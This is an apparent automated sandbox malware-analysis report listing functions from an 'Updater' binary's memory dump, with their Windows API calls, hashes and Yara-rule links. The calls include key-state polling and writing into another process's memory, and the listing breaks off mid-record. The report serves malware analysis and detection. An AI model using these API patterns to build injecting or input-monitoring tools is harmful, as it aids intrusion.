Function 00B34B74 Relevance: 7.6, APIs: 5, Instructions: 122keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00B34B88
ScreenToClient.USER32(00000000,?), ref: 00B34BA5
GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
GetAsyncKeyState.USER32(00000002), ref: 00B34BE8

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 0c16d7ac17f0d54951b0c7d89593d64919a60058d1e4fd9fffa7abed71bfdbbb
Instruction ID: 51bc2f10c40aa4fafb0776cf10be45cc962914594644ae56da74c1b0a4273505
Opcode Fuzzy Hash: 0c16d7ac17f0d54951b0c7d89593d64919a60058d1e4fd9fffa7abed71bfdbbb
Instruction Fuzzy Hash: A5417231A0811ABFDF159F64C884BEEB7B4FB09320F208395E439A7290DB756950DBA1

Function 00B96291 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000002), ref: 00B962C9
CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B9634B
GetLastError.KERNEL32(?,00000000), ref: 00B96371
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B96396
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B963C2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CreateFileHardLink$AttributesDeleteErrorLast
String ID:
API String ID: 4077537916-0
Opcode ID: 8e390d68b6f8bfbc945d5b8070bf35163b07ed88ca3284ba0c7be86ab7fd77a7
Instruction ID: 589c2d570adcd8ed9aa8a029e8f08bd9b4ff64244a35a04813cdfb365de99749
Opcode Fuzzy Hash: 8e390d68b6f8bfbc945d5b8070bf35163b07ed88ca3284ba0c7be86ab7fd77a7
Instruction Fuzzy Hash: 07414C35200624DFCF10DF14D554A5EBBE1EF49B20B1880D8E95AAB362CB79FE01CBA5

Function 00B82A1B Relevance: 7.6, APIs: 5, Instructions: 94sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B82A2F
PostMessageW.USER32(00000001,00000201,00000001), ref: 00B82ADB
Sleep.KERNEL32(00000000,?,?,?), ref: 00B82AE3
PostMessageW.USER32(00000001,00000202,00000000), ref: 00B82AF4
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B82AFC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: e977bbcf8767ec7b5444ee13810c57a36c6e2d39270f2fea8bbc25fe60050511
Instruction ID: c402f6c95f41b2a05b78f69a32c015cf02f8c70213f1c70cc1d80bc16c19f1d6
Opcode Fuzzy Hash: e977bbcf8767ec7b5444ee13810c57a36c6e2d39270f2fea8bbc25fe60050511
Instruction Fuzzy Hash: 0531C471900219EFDB18DFA8CD89BDE7BB5EF04315F104259F925A72E0D7709954CB90

Function 00BA14FC Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00BA151D
GetForegroundWindow.USER32 ref: 00BA1534
GetDC.USER32(00000000), ref: 00BA1570
GetPixel.GDI32(00000000,?,00000003), ref: 00BA157C
ReleaseDC.USER32(00000000,00000003), ref: 00BA15B4

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 1d7c5f9e72a4ecad3c9f70f2c769a5e2dd3ce692f9a0977e8bf56e9a8e89b92e
Instruction ID: 5df16ab145c4a17702fdba3edd43738d6de1d65b8f7449a83bbf8509b6d78487
Opcode Fuzzy Hash: 1d7c5f9e72a4ecad3c9f70f2c769a5e2dd3ce692f9a0977e8bf56e9a8e89b92e
Instruction Fuzzy Hash: 68219F75A00214AFDB04DF69D885AAEB7F8EF88710F0085B8E84AD7351DA74ED40CFA0

Function 00B5CBED Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B5CBF6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B5CC19

Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B5CC3F
_free.LIBCMT ref: 00B5CC52
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5CC61

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: c5b2f99226dc66bad61eebd4afd65dbd87421d54ac3ac6c293cf495a6fe67067
Instruction ID: ef92ae97b75873d07280909f03a989dd0f36810fdf6f4bca6023477d195fc94f
Opcode Fuzzy Hash: c5b2f99226dc66bad61eebd4afd65dbd87421d54ac3ac6c293cf495a6fe67067
Instruction Fuzzy Hash: EB0171766023157F272166AA5C8CE7B6EEEDEC6B6231402E9FD09D3241EE648C0591F0

Function 00B52CCF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00B526D1,00B5281A,?,?,00B2FC79,?,?,00B2111E), ref: 00B52CD4
_free.LIBCMT ref: 00B52D09
_free.LIBCMT ref: 00B52D30
SetLastError.KERNEL32(00000000), ref: 00B52D3D
SetLastError.KERNEL32(00000000), ref: 00B52D46

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 86c9fbb8687fdd60f2062081db4f03b932df85eedf91a60eab46677c6b323e92
Instruction ID: 3fa1f9b0e16e3696b1de3014bb8dc07aded63a7b3f13ef2e6a5238dd6dd80db7
Opcode Fuzzy Hash: 86c9fbb8687fdd60f2062081db4f03b932df85eedf91a60eab46677c6b323e92
Instruction Fuzzy Hash: AE01D136202641AB871667286CC5F2B21F9DBD77B3B3401F4FD00A72E2FEA58C0D5160

Function 00B810AB Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810C8
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810E3
lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810F1
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B81101
CLSIDFromString.OLE32(?,?,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B8110D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 2363b409d0f595cb6d52f63ce05f06e72552410f86e2856ff136c02ad4835713
Instruction ID: ba20e78b23bf92299b3091c8222e88b3a5bdc6229fb51ce7e29b1b4ba068c395
Opcode Fuzzy Hash: 2363b409d0f595cb6d52f63ce05f06e72552410f86e2856ff136c02ad4835713
Instruction Fuzzy Hash: 5001D472602204ABDB106F18DC48BAABBECEB44762F104564FE09D3220FB75CD41CBA0

Function 00B8F7F5 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00B8F811
QueryPerformanceFrequency.KERNEL32(?), ref: 00B8F81F
Sleep.KERNEL32(00000000), ref: 00B8F827
QueryPerformanceCounter.KERNEL32(?), ref: 00B8F831
Sleep.KERNEL32 ref: 00B8F86D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0dd676fdd157db6b14f28eb217c79b96d7fed8bda40874c2e90ce3ddf22ba927
Instruction ID: 9e6e510dee1b9799f38ca3fdcb3344f02e5c1c0b2e842571671a10fb79fca9db
Opcode Fuzzy Hash: 0dd676fdd157db6b14f28eb217c79b96d7fed8bda40874c2e90ce3ddf22ba927
Instruction Fuzzy Hash: B2012D75C0161ADBDF00AFE9EC48AEDBBB8FB09711F0046A6E501B3160DF789554CBA1

Function 00B82203 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B8221E
GetLastError.KERNEL32(?,00000000,00000000,?,?,00B81CA1,?,?,?), ref: 00B8222A
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B81CA1,?,?,?), ref: 00B82239
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B81CA1,?,?,?), ref: 00B82240
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B82257

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: b8c3a40a71643574b5daefcebb39267a8733a488f62c18a3e39c67dbefb8f2f6
Instruction ID: 55721d66fc54682a173f1efe836e38da6c01eab8fc5962546861e5b3a516344d
Opcode Fuzzy Hash: b8c3a40a71643574b5daefcebb39267a8733a488f62c18a3e39c67dbefb8f2f6
Instruction Fuzzy Hash: D0018CB5600205BFDB115FA9DC48E6A3BAEEF89360B2141A8FD49D3360EE75DC40CB60

Function 00B8211E Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B82134
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B82140
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B8214F
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B82156
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B8216C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 973f6dc1d4c32ec88c6ba942bac599ca9d42d989f777460fead80d3ccf50d479
Instruction ID: 273880791c6a61f5150be83a13a07be1ed0b624a880fefc2c8f92c733bb10ba2
Opcode Fuzzy Hash: 973f6dc1d4c32ec88c6ba942bac599ca9d42d989f777460fead80d3ccf50d479
Instruction Fuzzy Hash: 57F04FB5100301AFD7122FA4EC5DF563BADEF89760F200514FB45E7260DEB4D800CA60

Function 00B86C29 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B86C3D
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B86C54
MessageBeep.USER32(00000000), ref: 00B86C6C
KillTimer.USER32(?,0000040A), ref: 00B86C88
EndDialog.USER32(?,00000001), ref: 00B86CA2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 97b16d23bb4f8a0505b0b345ecef730891225142bf1840bad5c5b51558d65965
Instruction ID: e64edc6fa8948121a921691c453cc47da10967db4d00df3c716ce2111a6e4d84
Opcode Fuzzy Hash: 97b16d23bb4f8a0505b0b345ecef730891225142bf1840bad5c5b51558d65965
Instruction Fuzzy Hash: F8016230500308ABEB246F65ED4EBA677B8FB00706F0007A9B586A20E1EBE46954CF91

Function 00B9116D Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B91182
CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B9118F
CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B9119C
CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B911A9
CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B911B6
CloseHandle.KERNEL32(?,?,?,?,00B90FE5,?,00B940D1,?,00000001,00B68E5C,?), ref: 00B911C3

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ce099d6a8313506228a84157b34ffec94bb3e58cd9eaa34600a7af5176ae2c16
Instruction ID: 2e4309e5c5ba6285fdcdf8ed53de26ce746bf20be2fc30d2c33a4fdd3307fd17
Opcode Fuzzy Hash: ce099d6a8313506228a84157b34ffec94bb3e58cd9eaa34600a7af5176ae2c16
Instruction Fuzzy Hash: 32019071801B26AFCB309F6AD880412FAF5EE502153158E7ED29662921C7B0A945DE80

Function 00B5D56A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B5D582

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

_free.LIBCMT ref: 00B5D594
_free.LIBCMT ref: 00B5D5A6
_free.LIBCMT ref: 00B5D5B8
_free.LIBCMT ref: 00B5D5CA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: 3d0eed0e48c8f67ebe80d33620f83470b05407f2e6329a957b81ba5eeb15542e
Instruction ID: dee1d823379521bf492dce5e7de9b858de2532aec5a0526e514c2dff615b2ee7
Opcode Fuzzy Hash: 3d0eed0e48c8f67ebe80d33620f83470b05407f2e6329a957b81ba5eeb15542e
Instruction Fuzzy Hash: 35F06D32509284AB8634EB5CF8C2E1A77EDEA14312B6809C5F909DB541DF70FD84CA60

Function 00B84B6E Relevance: 7.5, APIs: 5, Instructions: 33COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00B84B7D
GetParent.USER32 ref: 00B84B84
GetWindowLongW.USER32(?,000000F0), ref: 00B84B91
GetWindowLongW.USER32(?,000000F0), ref: 00B84BA7

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LongWindow$Parent
String ID:
API String ID: 2125864951-0
Opcode ID: 7b778ed9f907b6c7b397e90ade3a3c8f6762da9ca1588db06340315a2274632a
Instruction ID: e01d9bfa125dc0c6f85800161acb1226e0b4fd30e2917cba1083a2d50f6dc102
Opcode Fuzzy Hash: 7b778ed9f907b6c7b397e90ade3a3c8f6762da9ca1588db06340315a2274632a
Instruction Fuzzy Hash: C3E06D32209133A75A1136296C00FAA76DC5E5277472203A1F821F31F4EB99E80286A8

Function 00B520C4 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B520E2

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

_free.LIBCMT ref: 00B520F4
_free.LIBCMT ref: 00B52107
_free.LIBCMT ref: 00B52118
_free.LIBCMT ref: 00B52129

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: f2c9bf31f408979f16348a49e124eb0779256c6551f3a6e342bf1a5a3d12667b
Instruction ID: 72b94d04c6e0f1d13e9102bcf747c12bb172b0b1b7f27dfc7b1f9cc08879596c
Opcode Fuzzy Hash: f2c9bf31f408979f16348a49e124eb0779256c6551f3a6e342bf1a5a3d12667b
Instruction Fuzzy Hash: D5F03A708071A1CFC616AF18BC816297BE4FB0A76174809CAF9109B2B4CF790D05DF81

Function 00B50D68 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00B50F1A
__freea.LIBCMT ref: 00B50F38

Part of subcall function 00B51358: _free.LIBCMT ref: 00B51370

Strings

a/p, xrefs: 00B50FFF
am/pm, xrefs: 00B50F9B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 2b7d813eae74714a81927fd909144328ddf540ab6ff1afdf6d84dbabd06fbd3e
Instruction ID: 93d464ededcb304eab7405b4b04971d8f90151da8337bc2c535886a7f111d1ac
Opcode Fuzzy Hash: 2b7d813eae74714a81927fd909144328ddf540ab6ff1afdf6d84dbabd06fbd3e
Instruction Fuzzy Hash: A3D10531910606DADB249F6CC8957FAB7F0EF05702F2849DAEE15BB290D3759D88CB90

Function 00B837EF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B8C259: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B83287,?,?,00000034,00000800,?,00000034), ref: 00B8C283

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B83839

Part of subcall function 00B8C224: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B832B6,?,?,00000800,?,00001073,00000000,?,?), ref: 00B8C24E

Part of subcall function 00B8C17E: GetWindowThreadProcessId.USER32(?,?), ref: 00B8C1A9
Part of subcall function 00B8C17E: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B8324B,00000034,?,?,00001004,00000000,00000000), ref: 00B8C1B9
Part of subcall function 00B8C17E: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B8324B,00000034,?,?,00001004,00000000,00000000), ref: 00B8C1CF

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B838A6
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B838F3

Strings

@, xrefs: 00B8390B

Memory Dump Source

